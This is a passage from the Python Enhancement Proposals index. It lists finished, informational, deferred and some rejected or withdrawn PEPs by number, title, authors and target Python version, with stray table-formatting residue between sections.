SF221Import AsThomas Wouters2.0
SF223Change the Meaning of x EscapesTim Peters2.0
SF227Statically Nested ScopesJeremy Hylton2.1
SF229Using Distutils to Build PythonA.M. Kuchling2.1
SF230Warning FrameworkGuido van Rossum2.1
SF232Function AttributesBarry Warsaw2.1
SF234IteratorsKa-Ping Yee, Guido van Rossum2.1
SF235Import on Case-Insensitive PlatformsTim Peters2.1
SF236Back to the __future__Tim Peters2.1
SF237Unifying Long Integers and IntegersMoshe Zadka, Guido van Rossum2.2
SF238Changing the Division OperatorMoshe Zadka, Guido van Rossum2.2
SF250Using site-packages on WindowsPaul Moore2.2
SF252Making Types Look More Like ClassesGuido van Rossum2.2
SF253Subtyping Built-in TypesGuido van Rossum2.2
SF255Simple GeneratorsNeil Schemenauer, Tim Peters, Magnus Lie Hetland2.2
SF260Simplify xrange()Guido van Rossum2.2
SF261Support for “wide” Unicode charactersPaul Prescod2.2
SF263Defining Python Source Code EncodingsMarc-André Lemburg, Martin von Löwis2.3
SF264Future statements in simulated shellsMichael Hudson2.2
SF273Import Modules from Zip ArchivesJames C. Ahlstrom2.3
SF274Dict ComprehensionsBarry Warsaw2.7, 3.0
SF277Unicode file name support for Windows NTNeil Hodgson2.3
SF278Universal Newline SupportJack Jansen2.3
SF279The enumerate() built-in functionRaymond Hettinger2.3
SF282A Logging SystemVinay Sajip, Trent Mick2.3
SF285Adding a bool typeGuido van Rossum2.3
SF289Generator ExpressionsRaymond Hettinger2.4
SF292Simpler String SubstitutionsBarry Warsaw2.4
SF293Codec Error Handling CallbacksWalter Dörwald2.3
SF301Package Index and Metadata for DistutilsRichard Jones2.3
SF302New Import HooksJust van Rossum, Paul Moore2.3
SF305CSV File APIKevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells2.3
SF307Extensions to the pickle protocolGuido van Rossum, Tim Peters2.3
SF308Conditional ExpressionsGuido van Rossum, Raymond Hettinger2.5
SF309Partial Function ApplicationPeter Harris2.5
SF311Simplified Global Interpreter Lock Acquisition for ExtensionsMark Hammond2.3
SF318Decorators for Functions and MethodsKevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter2.4
SF322Reverse IterationRaymond Hettinger2.4
SF324subprocess - New process modulePeter Astrand2.4
SF327Decimal Data TypeFacundo Batista2.4
SF328Imports: Multi-Line and Absolute/RelativeAahz2.4, 2.5, 2.6
SF331Locale-Independent Float/String ConversionsChristian R. Reis2.4
SF338Executing modules as scriptsAlyssa Coghlan2.5
SF341Unifying try-except and try-finallyGeorg Brandl2.5
SF342Coroutines via Enhanced GeneratorsGuido van Rossum, Phillip J. Eby2.5
SF343The “with” StatementGuido van Rossum, Alyssa Coghlan2.5
SF352Required Superclass for ExceptionsBrett Cannon, Guido van Rossum2.5
SF353Using ssize_t as the index typeMartin von Löwis2.5
SF357Allowing Any Object to be Used for SlicingTravis Oliphant2.5
SF358The “bytes” ObjectNeil Schemenauer, Guido van Rossum2.6, 3.0
SF362Function Signature ObjectBrett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings3.3
SF366Main module explicit relative importsAlyssa Coghlan2.6, 3.0
SF370Per user site-packages directoryChristian Heimes2.6, 3.0
SF371Addition of the multiprocessing package to the standard libraryJesse Noller, Richard Oudkerk2.6, 3.0
SF372Adding an ordered dictionary to collectionsArmin Ronacher, Raymond Hettinger2.7, 3.1
SF376Database of Installed Python DistributionsTarek Ziadé2.7, 3.2
SF378Format Specifier for Thousands SeparatorRaymond Hettinger2.7, 3.1
SF380Syntax for Delegating to a SubgeneratorGregory Ewing3.3
SF383Non-decodable Bytes in System Character InterfacesMartin von Löwis3.1
SF384Defining a Stable ABIMartin von Löwis3.2
SF389argparse - New Command Line Parsing ModuleSteven Bethard2.7, 3.2
SF391Dictionary-Based Configuration For LoggingVinay Sajip2.7, 3.2
SF393Flexible String RepresentationMartin von Löwis3.3
SF397Python launcher for WindowsMark Hammond, Martin von Löwis3.3
SF405Python Virtual EnvironmentsCarl Meyer3.3
SF409Suppressing exception contextEthan Furman3.3
SF412Key-Sharing DictionaryMark Shannon3.3
SF414Explicit Unicode Literal for Python 3.3Armin Ronacher, Alyssa Coghlan3.3
SF415Implement context suppression with exception attributesBenjamin Peterson3.3
SF417Including mock in the Standard LibraryMichael Foord3.3
SF418Add monotonic time, performance counter, and process time functionsCameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner3.3
SF420Implicit Namespace PackagesEric V. Smith3.3
SF421Adding sys.implementationEric Snow3.3
SF424A method for exposing a length hintAlex Gaynor3.4
SF425Compatibility Tags for Built DistributionsDaniel Holth3.4
SF427The Wheel Binary Package Format 1.0Daniel Holth
SF428The pathlib module – object-oriented filesystem pathsAntoine Pitrou3.4
SF435Adding an Enum type to the Python standard libraryBarry Warsaw, Eli Bendersky, Ethan Furman3.4
SF436The Argument Clinic DSLLarry Hastings3.4
SF440Version Identification and Dependency SpecificationAlyssa Coghlan, Donald Stufft
SF441Improving Python ZIP Application SupportDaniel Holth, Paul Moore3.5
SF442Safe object finalizationAntoine Pitrou3.4
SF443Single-dispatch generic functionsŁukasz Langa3.4
SF445Add new APIs to customize Python memory allocatorsVictor Stinner3.4
SF446Make newly created file descriptors non-inheritableVictor Stinner3.4
SF448Additional Unpacking GeneralizationsJoshua Landau3.5
SF450Adding A Statistics Module To The Standard LibrarySteven D’Aprano3.4
SF451A ModuleSpec Type for the Import SystemEric Snow3.4
SF453Explicit bootstrapping of pip in Python installationsDonald Stufft, Alyssa Coghlan
SF454Add a new tracemalloc module to trace Python memory allocationsVictor Stinner3.4
SF456Secure and interchangeable hash algorithmChristian Heimes3.4
SF461Adding % formatting to bytes and bytearrayEthan Furman3.5
SF465A dedicated infix operator for matrix multiplicationNathaniel J. Smith3.5
SF466Network Security Enhancements for Python 2.7.xAlyssa Coghlan2.7.9
SF468Preserving the order of **kwargs in a function.Eric Snow3.6
SF471os.scandir() function – a better and faster directory iteratorBen Hoyt3.5
SF475Retry system calls failing with EINTRCharles-François Natali, Victor Stinner3.5
SF476Enabling certificate verification by default for stdlib http clientsAlex Gaynor2.7.9, 3.4.3, 3.5
SF477Backport ensurepip (PEP 453) to Python 2.7Donald Stufft, Alyssa Coghlan
SF479Change StopIteration handling inside generatorsChris Angelico, Guido van Rossum3.5
SF484Type HintsGuido van Rossum, Jukka Lehtosalo, Łukasz Langa3.5
SF485A Function for testing approximate equalityChristopher Barker3.5
SF486Make the Python Launcher aware of virtual environmentsPaul Moore3.5
SF487Simpler customisation of class creationMartin Teichmann3.6
SF488Elimination of PYO filesBrett Cannon3.5
SF489Multi-phase extension module initializationPetr Viktorin, Stefan Behnel, Alyssa Coghlan3.5
SF492Coroutines with async and await syntaxYury Selivanov3.5
SF493HTTPS verification migration tools for Python 2.7Alyssa Coghlan, Robert Kuska, Marc-André Lemburg2.7.12
SF495Local Time DisambiguationAlexander Belopolsky, Tim Peters3.6
SF498Literal String InterpolationEric V. Smith3.6
SF503Simple Repository APIDonald Stufft
SF506Adding A Secrets Module To The Standard LibrarySteven D’Aprano3.6
SF508Dependency specification for Python Software PackagesRobert Collins
SF515Underscores in Numeric LiteralsGeorg Brandl, Serhiy Storchaka3.6
SF517A build-system independent format for source treesNathaniel J. Smith, Thomas Kluyver
SF518Specifying Minimum Build System Requirements for Python ProjectsBrett Cannon, Nathaniel J. Smith, Donald Stufft
SF519Adding a file system path protocolBrett Cannon, Koos Zevenhoven3.6
SF520Preserving Class Attribute Definition OrderEric Snow3.6
SF523Adding a frame evaluation API to CPythonBrett Cannon, Dino Viehland3.6
SF524Make os.urandom() blocking on LinuxVictor Stinner3.6
SF525Asynchronous GeneratorsYury Selivanov3.6
SF526Syntax for Variable AnnotationsRyan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum3.6
SF527Removing Un(der)used file types/extensions on PyPIDonald Stufft
SF528Change Windows console encoding to UTF-8Steve Dower3.6
SF529Change Windows filesystem encoding to UTF-8Steve Dower3.6
SF530Asynchronous ComprehensionsYury Selivanov3.6
SF538Coercing the legacy C locale to a UTF-8 based localeAlyssa Coghlan3.7
SF539A New C-API for Thread-Local Storage in CPythonErik M. Bray, Masayuki Yamamoto3.7
SF540Add a new UTF-8 ModeVictor Stinner3.7
SF544Protocols: Structural subtyping (static duck typing)Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa3.8
SF552Deterministic pycsBenjamin Peterson3.7
SF553Built-in breakpoint()Barry Warsaw3.7
SF557Data ClassesEric V. Smith3.7
SF560Core support for typing module and generic typesIvan Levkivskyi3.7
SF561Distributing and Packaging Type InformationEthan Smith3.7
SF562Module __getattr__ and __dir__Ivan Levkivskyi3.7
SF564Add new time functions with nanosecond resolutionVictor Stinner3.7
SF565Show DeprecationWarning in __main__Alyssa Coghlan3.7
SF566Metadata for Python Software Packages 2.1Dustin Ingram3.x
SF567Context VariablesYury Selivanov3.7
SF570Python Positional-Only ParametersLarry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele3.8
SF572Assignment ExpressionsChris Angelico, Tim Peters, Guido van Rossum3.8
SF573Module State Access from C Extension MethodsPetr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch3.9
SF574Pickle protocol 5 with out-of-band dataAntoine Pitrou3.8
SF578Python Runtime Audit HooksSteve Dower3.8
SF584Add Union Operators To dictSteven D’Aprano, Brandt Bucher3.9
SF585Type Hinting Generics In Standard CollectionsŁukasz Langa3.9
SF586Literal TypesMichael Lee, Ivan Levkivskyi, Jukka Lehtosalo3.8
SF587Python Initialization ConfigurationVictor Stinner, Alyssa Coghlan3.8
SF589TypedDict: Type Hints for Dictionaries with a Fixed Set of KeysJukka Lehtosalo3.8
SF591Adding a final qualifier to typingMichael J. Sullivan, Ivan Levkivskyi3.8
SF592Adding “Yank” Support to the Simple APIDonald Stufft
SF593Flexible function and variable annotationsTill Varoquaux, Konstantin Kashin3.9
SF594Removing dead batteries from the standard libraryChristian Heimes, Brett Cannon3.11
SF597Add optional EncodingWarningInada Naoki3.10
SF600Future ‘manylinux’ Platform Tags for Portable Linux Built DistributionsNathaniel J. Smith, Thomas Kluyver
SF604Allow writing union types as X | YPhilippe PRADOS, Maggie Moss3.10
SF610Recording the Direct URL Origin of installed distributionsStéphane Bidoul, Chris Jerdonek
SF612Parameter Specification VariablesMark Mendoza3.10
SF613Explicit Type AliasesShannon Zhu3.10
SF614Relaxing Grammar Restrictions On DecoratorsBrandt Bucher3.9
SF615Support for the IANA Time Zone Database in the Standard LibraryPaul Ganssle3.9
SF616String methods to remove prefixes and suffixesDennis Sweeney3.9
SF617New PEG parser for CPythonGuido van Rossum, Pablo Galindo, Lysandros Nikolaou3.9
SF618Add Optional Length-Checking To zipBrandt Bucher3.10
SF621Storing project metadata in pyproject.tomlBrett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SF623Remove wstr from UnicodeInada Naoki3.10
SF624Remove Py_UNICODE encoder APIsInada Naoki3.11
SF626Precise line numbers for debugging and other tools.Mark Shannon3.10
SF627Recording installed projectsPetr Viktorin
SF628Add math.tauAlyssa Coghlan3.6
SF629Versioning PyPI’s Simple APIDonald Stufft
SF632Deprecate distutils moduleSteve Dower3.10
SF634Structural Pattern Matching: SpecificationBrandt Bucher, Guido van Rossum3.10
SF643Metadata for Package Source DistributionsPaul Moore
SF644Require OpenSSL 1.1.1 or newerChristian Heimes3.10
SF646Variadic GenericsMark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles3.11
SF647User-Defined Type GuardsEric Traut3.10
SF652Maintaining the Stable ABIPetr Viktorin3.10
SF654Exception Groups and except*Irit Katriel, Yury Selivanov, Guido van Rossum3.11
SF655Marking individual TypedDict items as required or potentially-missingDavid Foster3.11
SF656Platform Tag for Linux Distributions Using MuslTzu-ping Chung
SF657Include Fine Grained Error Locations in TracebacksPablo Galindo, Batuhan Taskaya, Ammar Askar3.11
SF660Editable installs for pyproject.toml based builds (wheel based)Daniel Holth, Stéphane Bidoul
SF667Consistent views of namespacesMark Shannon, Tian Gao3.13
SF669Low Impact Monitoring for CPythonMark Shannon3.12
SF670Convert macros to functions in the Python C APIErlend Egeberg Aasland, Victor Stinner3.11
SF673Self TypePradeep Kumar Srinivasan, James Hilton-Balfe3.11
SF675Arbitrary Literal String TypePradeep Kumar Srinivasan, Graham Bleaney3.11
SF678Enriching Exceptions with NotesZac Hatfield-Dodds3.11
SF680tomllib: Support for Parsing TOML in the Standard LibraryTaneli Hukkinen, Shantanu Jain3.11
SF681Data Class TransformsErik De Bonte, Eric Traut3.11
SF682Format Specifier for Signed ZeroJohn Belmonte3.11
SF683Immortal Objects, Using a Fixed RefcountEric Snow, Eddie Elizondo3.12
SF684A Per-Interpreter GILEric Snow3.12
SF688Making the buffer protocol accessible in PythonJelle Zijlstra3.12
SF689Unstable C API tierPetr Viktorin3.12
SF692Using TypedDict for more precise **kwargs typingFranek Magiera3.12
SF695Type Parameter SyntaxEric Traut3.12
SF696Type Defaults for Type ParametersJames Hilton-Balfe3.13
SF697Limited C API for Extending Opaque TypesPetr Viktorin3.12
SF698Override Decorator for Static TypingSteven Troxler, Joshua Xu, Shannon Zhu3.12
SF700Additional Fields for the Simple API for Package IndexesPaul Moore
SF702Marking deprecations using the type systemJelle Zijlstra3.13
SF705TypedDict: Read-only itemsAlice Purcell3.13
SF706Filter for tarfile.extractallPetr Viktorin3.12
SF709Inlined comprehensionsCarl Meyer3.12
SF715Disabling bdist_egg distribution uploads on PyPIWilliam Woodruff
SF721Using tarfile.data_filter for source distribution extractionPetr Viktorin3.12
SF723Inline script metadataOfek Lev
SF730Adding iOS as a supported platformRussell Keith-Magee3.13
SF737C API to format a type fully qualified nameVictor Stinner3.13
SF738Adding Android as a supported platformMalcolm Smith3.13
SF740Index support for digital attestationsWilliam Woodruff, Facundo Tuesca, Dustin Ingram
SF741Python Configuration C APIVictor Stinner3.14
SF742Narrowing types with TypeIsJelle Zijlstra3.13
SF757C API to import-export Python integersSergey B Kirpichev, Victor Stinner3.14
SF3101Advanced String FormattingTalin3.0
SF3102Keyword-Only ArgumentsTalin3.0
SF3104Access to Names in Outer ScopesKa-Ping Yee3.0
SF3105Make print a functionGeorg Brandl3.0
SF3106Revamping dict.keys(), .values() and .items()Guido van Rossum3.0
SF3107Function AnnotationsCollin Winter, Tony Lownds3.0
SF3108Standard Library ReorganizationBrett Cannon3.0
SF3109Raising Exceptions in Python 3000Collin Winter3.0
SF3110Catching Exceptions in Python 3000Collin Winter3.0
SF3111Simple input built-in in Python 3000Andre Roberge3.0
SF3112Bytes literals in Python 3000Jason Orendorff3.0
SF3113Removal of Tuple Parameter UnpackingBrett Cannon3.0
SF3114Renaming iterator.next() to iterator.__next__()Ka-Ping Yee3.0
SF3115Metaclasses in Python 3000Talin3.0
SF3116New I/ODaniel Stutzbach, Guido van Rossum, Mike Verdone3.0
SF3118Revising the buffer protocolTravis Oliphant, Carl Banks3.0
SF3119Introducing Abstract Base ClassesGuido van Rossum, Talin3.0
SF3120Using UTF-8 as the default source encodingMartin von Löwis3.0
SF3121Extension Module Initialization and FinalizationMartin von Löwis3.0
SF3123Making PyObject_HEAD conform to standard CMartin von Löwis3.0
SF3127Integer Literal Support and SyntaxPatrick Maupin3.0
SF3129Class DecoratorsCollin Winter3.0
SF3131Supporting Non-ASCII IdentifiersMartin von Löwis3.0
SF3132Extended Iterable UnpackingGeorg Brandl3.0
SF3134Exception Chaining and Embedded TracebacksKa-Ping Yee3.0
SF3135New SuperCalvin Spealman, Tim Delaney, Lie Ryan3.0
SF3137Immutable Bytes and Mutable BufferGuido van Rossum3.0
SF3138String representation in Python 3000Atsuo Ishimoto3.0
SF3141A Type Hierarchy for NumbersJeffrey Yasskin3.0
SF3144IP Address Manipulation Library for the Python Standard LibraryPeter Moody3.3
SF3147PYC Repository DirectoriesBarry Warsaw3.2
SF3148futures - execute computations asynchronouslyBrian Quinlan3.2
SF3149ABI version tagged .so filesBarry Warsaw3.2
SF3151Reworking the OS and IO exception hierarchyAntoine Pitrou3.3
SF3154Pickle protocol version 4Antoine Pitrou3.4
SF3155Qualified name for classes and functionsAntoine Pitrou3.3
SF3156Asynchronous IO Support Rebooted: the “asyncio” ModuleGuido van Rossum3.3
+
+
+

Historical Meta-PEPs and Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PS5Guidelines for Language EvolutionPaul Prescod
PS6Bug Fix ReleasesAahz, Anthony Baxter
IF160Python 1.6 Release ScheduleFred L. Drake, Jr.1.6
IF200Python 2.0 Release ScheduleJeremy Hylton2.0
IF226Python 2.1 Release ScheduleJeremy Hylton2.1
IF251Python 2.2 Release ScheduleBarry Warsaw, Guido van Rossum2.2
IF283Python 2.3 Release ScheduleGuido van Rossum2.3
IF320Python 2.4 Release ScheduleBarry Warsaw, Raymond Hettinger, Anthony Baxter2.4
PF347Migrating the Python CVS to SubversionMartin von Löwis
IF356Python 2.5 Release ScheduleNeal Norwitz, Guido van Rossum, Anthony Baxter2.5
PF360Externally Maintained PackagesBrett Cannon
IF361Python 2.6 and 3.0 Release ScheduleNeal Norwitz, Barry Warsaw2.6, 3.0
IF373Python 2.7 Release ScheduleBenjamin Peterson2.7
PF374Choosing a distributed VCS for the Python projectBrett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman
IF375Python 3.1 Release ScheduleBenjamin Peterson3.1
PF385Migrating from Subversion to MercurialDirkjan Ochtman, Antoine Pitrou, Georg Brandl
IF392Python 3.2 Release ScheduleGeorg Brandl3.2
IF398Python 3.3 Release ScheduleGeorg Brandl3.3
IF404Python 2.8 Un-release ScheduleBarry Warsaw2.8
IF429Python 3.4 Release ScheduleLarry Hastings3.4
PS438Transitioning to release-file hosting on PyPIHolger Krekel, Carl Meyer
PF449Removal of the PyPI Mirror Auto Discovery and Naming SchemeDonald Stufft
PF464Removal of the PyPI Mirror Authenticity APIDonald Stufft
PF470Removing External Hosting Support on PyPIDonald Stufft
IF478Python 3.5 Release ScheduleLarry Hastings3.5
IF494Python 3.6 Release ScheduleNed Deily3.6
PF512Migrating from hg.python.org to GitHubBrett Cannon
IF537Python 3.7 Release ScheduleNed Deily3.7
PF541Package Index Name RetentionŁukasz Langa
IF569Python 3.8 Release ScheduleŁukasz Langa3.8
PF581Using GitHub Issues for CPythonMariatta
PF3000Python 3000Guido van Rossum
PF3002Procedure for Backwards-Incompatible ChangesSteven Bethard
PF3003Python Language MoratoriumBrett Cannon, Jesse Noller, Guido van Rossum
PF3099Things that will Not Change in Python 3000Georg Brandl
PF3100Miscellaneous Python 3.0 PlansBrett Cannon
PF8001Python Governance Voting ProcessBrett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
+
+
+

Deferred PEPs (postponed pending further research or updates)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SD213Attribute Access HandlersPaul Prescod2.1
SD219Stackless PythonGordon McMillan2.1
SD222Web Library EnhancementsA.M. Kuchling2.1
SD233Python Online HelpPaul Prescod2.1
SD267Optimized Access to Module NamespacesJeremy Hylton2.2
SD269Pgen Module for PythonJonathan Riehl2.2
SD280Optimizing access to globalsGuido van Rossum2.3
SD286Enhanced Argument TuplesMartin von Löwis2.3
SD312Simple Implicit LambdaRoman Suzi, Alex Martelli2.4
SD316Programming by Contract for PythonTerence Way
SD323Copyable IteratorsAlex Martelli2.5
SD337Logging Usage in the Standard LibraryMichael P. Dubner2.5
SD368Standard image protocol and classLino Mastrodomenico2.6, 3.0
SD400Deprecate codecs.StreamReader and codecs.StreamWriterVictor Stinner3.3
SD403General purpose decorator clause (aka “@in” clause)Alyssa Coghlan3.4
PD407New release cycle and introducing long-term support versionsAntoine Pitrou, Georg Brandl, Barry Warsaw
SD419Protecting cleanup statements from interruptionsPaul Colomiets3.3
ID423Naming conventions and recipes related to packagingBenoit Bryon
ID444Python Web3 InterfaceChris McDonough, Armin Ronacher
SD447Add __getdescriptor__ method to metaclassRonald Oussoren
SD491The Wheel Binary Package Format 1.9Daniel Holth
SD499python -m foo should also bind ‘foo’ in sys.modulesCameron Simpson, Chris Angelico, Joseph Jevnik3.10
SD505None-aware operatorsMark E. Haase, Steve Dower3.8
SD532A circuit breaking protocol and binary operatorsAlyssa Coghlan, Mark E. Haase3.8
SD533Deterministic cleanup for iteratorsNathaniel J. Smith
SD534Improved Errors for Missing Standard Library ModulesTomáš Orsava, Petr Viktorin, Alyssa Coghlan
SD535Rich comparison chainingAlyssa Coghlan3.8
SD547Running extension modules using the -m optionMarcel Plch, Petr Viktorin3.7
SD556Threaded garbage collectionAntoine Pitrou3.7
SD568Generator-sensitivity for Context VariablesNathaniel J. Smith3.8
SD674Disallow using macros as l-valuesVictor Stinner3.12
SD734Multiple Interpreters in the StdlibEric Snow3.13
SD3124Overloading, Generic Functions, Interfaces, and AdaptationPhillip J. Eby
SD3143Standard daemon process libraryBen Finney3.x
SD3150Statement local namespaces (aka “given” clause)Alyssa Coghlan3.4
+
+
+

Rejected, Superseded, and Withdrawn PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PW3Guidelines for Handling Bug ReportsJeremy Hylton
PW9Sample Plaintext PEP TemplateBarry Warsaw
PW42Feature RequestsJeremy Hylton
IS102Doing Python Micro ReleasesAnthony Baxter, Barry Warsaw, Guido van Rossum
IW103Collecting information about gitOleg Broytman
SR204Range LiteralsThomas Wouters2.0
IW206Python Advanced LibraryA.M. Kuchling
SW209Multi-dimensional ArraysPaul Barrett, Travis Oliphant2.2
SR210Decoupling the Interpreter LoopDavid Ascher2.1
SR211Adding A New Outer Product OperatorGreg Wilson2.1
SR212Loop Counter IterationPeter Schneider-Kamp2.1
SS215String InterpolationKa-Ping Yee2.1
IW216Docstring FormatMoshe Zadka
IR220Coroutines, Generators, ContinuationsGordon McMillan
SR224Attribute DocstringsMarc-André Lemburg2.1
SR225Elementwise/Objectwise OperatorsHuaiyu Zhu, Gregory Lielens2.1
SW228Reworking Python’s Numeric ModelMoshe Zadka, Guido van Rossum
SR231__findattr__()Barry Warsaw2.1
SR239Adding a Rational Type to PythonChristopher A. Craig, Moshe Zadka2.2
SR240Adding a Rational Literal to PythonChristopher A. Craig, Moshe Zadka2.2
SS241Metadata for Python Software PackagesA.M. Kuchling
SW242Numeric KindsPaul F. Dubois2.2
SW243Module Repository Upload MechanismSean Reifschneider2.1
SR244The directive statementMartin von Löwis2.1
SR245Python Interface SyntaxMichel Pelletier2.2
SR246Object AdaptationAlex Martelli, Clark C. Evans2.5
SR254Making Classes Look More Like TypesGuido van Rossum2.2
SR256Docstring Processing System FrameworkDavid Goodger
SR258Docutils Design SpecificationDavid Goodger
SR259Omit printing newline after newlineGuido van Rossum2.2
SR262A Database of Installed Python PackagesA.M. Kuchling
SR265Sorting Dictionaries by ValueGrant Griffin2.2
SW266Optimizing Global Variable/Attribute AccessSkip Montanaro2.3
SR268Extended HTTP functionality and WebDAVGreg Stein2.x
SR270uniq method for list objectsJason Petrone2.2
SR271Prefixing sys.path by command line optionFrédéric B. Giacometti2.2
SR275Switching on Multiple ValuesMarc-André Lemburg2.6
SR276Simple Iterator for intsJim Althoff2.3
SR281Loop Counter Iteration with range and xrangeMagnus Lie Hetland2.3
SR284Integer for-loopsDavid Eppstein, Gregory Ewing2.3
SW288Generators Attributes and ExceptionsRaymond Hettinger2.5
IS291Backward Compatibility for the Python 2 Standard LibraryNeal Norwitz2.3
SR294Type Names in the types ModuleOren Tirosh2.5
SR295Interpretation of multiline string constantsStepan Koltsov3.0
SW296Adding a bytes Object TypeScott Gilbert2.3
SR297Support for System UpgradesMarc-André Lemburg2.6
SW298The Locked Buffer InterfaceThomas Heller2.3
SR299Special __main__() function in modulesJeff Epler2.3
SR303Extend divmod() for Multiple DivisorsThomas Bellman2.3
SW304Controlling Generation of Bytecode FilesSkip Montanaro
IW306How to Change Python’s GrammarMichael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson
SR310Reliable Acquisition/Release PairsMichael Hudson, Paul Moore2.4
SR313Adding Roman Numeral Literals to PythonMike Meyer2.4
SS314Metadata for Python Software Packages 1.1A.M. Kuchling, Richard Jones2.5
SR315Enhanced While LoopRaymond Hettinger, W Isaac Carroll2.5
SR317Eliminate Implicit Exception InstantiationSteven Taschuk2.4
SR319Python Synchronize/Asynchronize BlockMichel Pelletier2.4
SW321Date/Time Parsing and FormattingA.M. Kuchling2.4
SR325Resource-Release Support for GeneratorsSamuele Pedroni2.4
SR326A Case for Top and Bottom ValuesJosiah Carlson, Terry Reedy2.4
SR329Treating Builtins as Constants in the Standard LibraryRaymond Hettinger2.4
SR330Python Bytecode VerificationMichel Pelletier2.6
SR332Byte vectors and String/Unicode UnificationSkip Montanaro2.5
SW334Simple Coroutines via SuspendIterationClark C. Evans3.0
SR335Overloadable Boolean OperatorsGregory Ewing3.3
SR336Make None CallableAndrew McClelland
IW339Design of the CPython CompilerBrett Cannon
SR340Anonymous Block StatementsGuido van Rossum
SS344Exception Chaining and Embedded TracebacksKa-Ping Yee2.5
SS345Metadata for Python Software Packages 1.2Richard Jones2.7
SW346User Defined (“with”) StatementsAlyssa Coghlan2.5
SR348Exception Reorganization for Python 3.0Brett Cannon
SR349Allow str() to return unicode stringsNeil Schemenauer2.5
IR350CodetagsMicah Elliott
SR351The freeze protocolBarry Warsaw
SS354Enumerations in PythonBen Finney2.6
SR355Path - Object oriented filesystem pathsBjörn Lindqvist2.5
SW359The “make” StatementSteven Bethard2.6
SR363Syntax For Dynamic Attribute AccessBen North
SW364Transitioning to the Py3K Standard LibraryBarry Warsaw2.6
SR365Adding the pkg_resources modulePhillip J. Eby
SS367New SuperCalvin Spealman, Tim Delaney2.6
SW369Post import hooksChristian Heimes2.6, 3.0
SR377Allow __enter__() methods to skip the statement bodyAlyssa Coghlan2.7, 3.1
SW379Adding an Assignment ExpressionJervis Whitley2.7, 3.2
SW381Mirroring infrastructure for PyPITarek Ziadé, Martin von Löwis
SR382Namespace PackagesMartin von Löwis3.2
SS386Changing the version comparison module in DistutilsTarek Ziadé
SR390Static metadata for DistutilsTarek Ziadé2.7, 3.2
